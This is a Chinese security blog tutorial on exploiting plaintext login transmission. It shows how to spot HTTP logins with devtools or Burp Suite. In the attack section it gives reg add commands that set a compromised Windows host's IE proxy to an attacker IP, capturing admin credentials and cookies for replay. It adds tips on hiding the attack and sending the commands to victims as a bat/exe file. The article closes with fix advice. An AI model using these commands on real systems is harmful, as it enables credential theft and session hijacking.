敏感数据明文传输引发的全新攻击

VSole2018-05-23 21:20:09

敏感数据的安全传输是网络安全技术的一个重要的组成部分,但是敏感数据(有且但不限于用户登录账户及密码)明文传输却是一个很常见的漏洞,而这个漏洞因为利用难度大而被评为一个中危风险——绝大多数扫描器或者人工渗透。 关于明文传输漏洞的解决方案,众所周知只有https是最佳实践,虽然ssl证书的价格需要考虑,以及https也不是绝对安全的,当遭受中间人劫持攻击的时候也会获取到传输中的明文数据,具体攻击详情见文章《HTTPS连接过程以及中间人攻击劫持》,但是这篇文章也说了,使用中间人攻击手段必须让客户端信任中间人的证书,否则攻击无效。因此这种攻击方式可以放弃,难度大且不方便隐藏攻击。

 

一、敏感数据明文传输 

敏感数据明文传输简单点来说就是当我们在网站上面提交敏感数据到服务器的过程中未进行相关加密处理,导致攻击者通过中间人攻击方式(劫持、嗅探等)即可获取到这些未加密的敏感数据。当攻击者获取到这些数据之后,就可以用这些信息以合法用户的身份进入到应用系统中——甚至可能进入到应用系统后台中,一旦进入到应用系统中那么就可以获取更多的敏感数据,以及更有机会发现更多的漏洞。 目前很多网站都是站库分离(站点与站点的数据库在不同的服务器上),获取了站点的权限不一定就会获取到更多的敏感数据更或是数据库的访问权限,可能连应用系统后台都进不去,使用嗅探呢?如果站点是使用https进行传输的,嗅探能成功吗?答案是否定的!下面将详细介绍关于对敏感数据明文传输漏洞如何利用的过程!

二、初验敏感数据是否是明文传输

我们如何判断一个网站的登录(下面将统一以登录的账号及密码作为敏感数据进行测试)是否是明文传输。一是使用抓包工具,二是使用浏览器自带的功能!推荐使用浏览器自带的功能,使用抓包的话推荐使用burpsuite,只是抓取https的数据包时需要提前进行额外的配置——安装burpsuite的CA证书,具体配置见官方配置。 首先通过火狐浏览器的F12功能,我们选择【网络】模块,并点击HTML进行筛选,如图1所示:

  

图1 设置火狐浏览器 然后点击登录即可获取到post或者get的请求头及请求主体的内容,如图2所示,就获取到了http明文登录的敏感数据了。

 图2 获取http敏感数据 通过使用burpsuite进行抓包也是一样的,只要配置好了burpsuite,我们也可以抓取这些敏感数据,如图3所示:

图3 获取http明文数据   

三、漏洞利用场景的思考 

上面的方式都是可以成功获取到用户的敏感数据,那么在渗透中我们怎么利用该漏洞呢?嗅探?不现实,入侵路由器?想太多,其实最简单的就是一个小操作即可,就是设置被攻击者的IE代理设置! 被攻击者——之前多数人理解进入了一个固定思维,理解为就是一般的用户,把管理员也归属于这一类,所以觉得攻击难度很大,可能在同一局域网中利用相对较多吧!本次攻击对象明确为管理员,针对管理员的攻击,对于一般的用户也照样适用!

四、模拟攻击

1. 攻击条件 通过思考我们发现,目前的利用也是存在有一定的限制的,姑且理解为技术不够。攻击条件主要有以下几方面:

  • 服务器需要是windows主机。
  • 攻击者需要有独立外网主机(或者同一局域网中)。
  • 服务器存在一定的漏洞(能执行命令),也可以通过钓鱼方式。
  • 对于第三个条件简单说明下,能执行命令,或者能获取到服务器的权限,不一定能获取到应用系统中存在的敏感数据或者数据库中的数据,例如,你在一个网站(只有一个登陆页面)处检测出了命令执行漏洞,可以执行命令,但是权限不是很高(即使权限很高,除非你只感兴趣服务器的控制权而不是应用系统中的敏感数据),此时我们就可以使用这种攻击方式了! 2. 实验环境介绍操作系统:Microsoft Windows Server 2008 R2 Enterprise,IP:192.168.1.25
  • 用户权限组:*Users
  • 使用工具:burpsuite
  • 攻击者IP:192.168.1.200

3. 配置攻击者burpsuite 由于我们是要获取被攻击者传过来的数据包,而被攻击者往往都是处于内网,外网访问多数是通过映射出来的,所以我们设置我们的burpsuite的代理为任意ip过来的数据包,如图4所示:

图4 配置攻击者的burpsuite

4. 设置被攻击者IE代理

如果能进入到桌面环境,可以通过图形化界面进行设置IE代理,如图5所示:

图5设置IE代理

如果不能进入到远程桌面,我们可以使用下面命令进行设置IE代理: //开启代理! 1. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f 

 

//设置代理ip及端口,为攻击者的ip,端口与burpsuite设置保持一致!

 1. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "192.168.1.200:8080" /f 

 

关闭设置的代理可以使用下面的命令:

 1. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_ 

 

以上命令经测试只要是users用户组即可成功执行,如图6所示,为了方便我们可以将开启和关闭的命令分别写为bat批处理文件。

  图6 users用户组即可成功执行

5. 获取敏感数据 为了不让被攻击者怀疑,我们不要开启截断功能,如图7所示:

图7 关闭截断功能

现在攻击者只需要等待管理员去服务器上面使用浏览器访问部署的网站,额外收获的话还可以获取到管理员其他网站上面的登录账户及密码等信息,另外如果管理员已经登录了网站,我们可以使用他登录的cookie或者token等信息在本地进行重放利用! 此时假设管理员登录了网站,如图8所示:

图8 被攻击者登录网站

此时攻击这边也获取到了这些登录数据,如图9所示:

图9 查看被攻击者http网站明文信息

五、总结及修复建议

通过上述可以说明,对于敏感数据明文传输,上面只是一种利用方式,我们还可以将开启代理的批处理文件(或者通过编程调用这些命令,到时可以直接发送exe文件给受害者,这样隐蔽性也相对较好!)发给安全意识不高的人员,一旦他们点击,我们即可获取到这些人员访问网站的所有数据,登录时获取登录凭证,已经登录的情况下获取登录成功的cookie等进行本地的重放等,所有对于这种攻击方式来说,危害还是很高的!修复建议参考如下:

  • 使用https来确保传输的安全,因为使用https的话对于中间人嗅探完全是乱码的!
  • 用户登录信息使用加密传输,如密码在传输前使用安全的算法加密后进行传输,可采用的算法包括:不可逆hash算法加盐(4位及以上随机数,由服务器端产生);安全对称加密算法,如AES(128、192、256位),且必须保证客户端密钥安全及随机,不可被破解或读出;非对称加密算法,如RSA(不低于1024位)且保证密钥的随机性等。只有保证同一密码加密的密文每次都是不同的方可,因为如果不是这样的话攻击者同样能获取到你的密文进行本地的一个重放登录,通过抓包将请求主体替换为被攻击者的请求主体,不一定非要明文才能利用,所以在加密的同时还需要考虑重放攻击!
  • 不要轻易运行陌生人发来的软件,安装软件的时候也谨慎点,防止捆绑有恶意软件!
  • 设置浏览器代理为不使用任何代理,主要是不要使用默认的系统代理,即IE代理!
  • 对服务器进行安全加固,防止利用服务器漏洞进行攻击! 
https嗅探
本作品采用《CC 协议》,转载必须注明作者和本文链接
0x01 工具介绍SubAps是新一代子域工具,可以全网爬虫获取子域,以数据库作为字典进行计次,提高准确率和效率。0x02 安装与使用1、主动扫描指的是通过从数据库读取Topxx(指定)数量的字域名前缀进行拼接,然后进行域名A记录的识别,对成功识别的进行站点访问,如果可以访问则提交至被动扫描进行爬虫并且将子域前缀入库,如果数据库存在则Conut次数+1。
本文发表在 WOOT'18: Proceedings of the 12th USENIX Conference on Offensive Technologies 在本文中,作者介绍了通过一些侧信道形式用户是否访问过某网站的方法,尽管发的会不是很出名,但是个人认为整个思路还是很有意思的,也学到了一些东西,所以写了一下比较长篇的笔记介绍。因为自己不经常写笔记,所以写的有点像翻译文章,今后如果
SCA可以利用以这种方式公开信息以发动攻击这一事实。攻击者只能依靠被攻击设备的意外电磁泄漏来重建受害者屏幕上显示的图像。产生的电磁耦合降低,电磁辐射的携带频率增加。此外,确保产品电磁兼容性的基本设计合规性有助于减少意外泄漏。这些因素使得对该信号的利用更加复杂,并降低了电磁辐射的拦截信号。
当其中任何一个数据包受到干扰,出现异常时,整个传输过程都会受到影响。针对不同的检测问题,有不同的命令可用。ManageEngine NetFlow Analyzer使用DPI引擎,可监控网络响应时间和应用程序响应时间,并执行分析,以查明某个网络或应用程序是否出现差错。NetFlow Analyzer 还允许用户列出受影响用户列表,以便企业向用户告知修复问题的解决方案。Wifi ExplorerWifi Explorer是一款面向macOS的无线网络数据包分析工具,可帮助用户发现可能干扰网络的信道冲突和信号重叠。
ICMPWatch是一款功能强大的ICMP数据包工具,该工具基于Python 3开发,可以帮助广大研究人员捕捉和分析ICMP(Internet控制报文协议)数据包。该工具能提供有关捕捉数据包的详细信息,包括数据包源IP地址、目标IP地址、MAC地址、ICMP类型以及Payload数据等。除此之外,该工具还支持将捕捉到的数据包存储到SQLite数据库中,并以pcap格式保存。
Above是一款专为红队研究人员设计的网络协议工具,该工具隐蔽型极强,可以帮助广大研究人员搜索目标网络中的相关安全漏洞。
作为两种常见的网络协议,HTTPHTTPS都是用于在浏览器和服务器之间传输数据的。然而在保障数据安全性方面,HTTPS远远优于HTTP。在网络安全愈发重要的当下,HTTP协议的不安全性使得其逐渐被淘汰弃用。那么使用HTTP协议有哪些风险呢?HTTPHTTPS的区别又是什么?下文将详细回答这些问题。使用HTTP协议有哪些风险?1.明文传输,内容可轻易窃听获取HTTP协议无法加密数据,所有通信数据
云原生实践下商用CI服务因其丰富的计算资源而被攻击者大量滥用,本文对此类攻击进行了系统性分析并提出了相关防御方案。
VSole
网络安全专家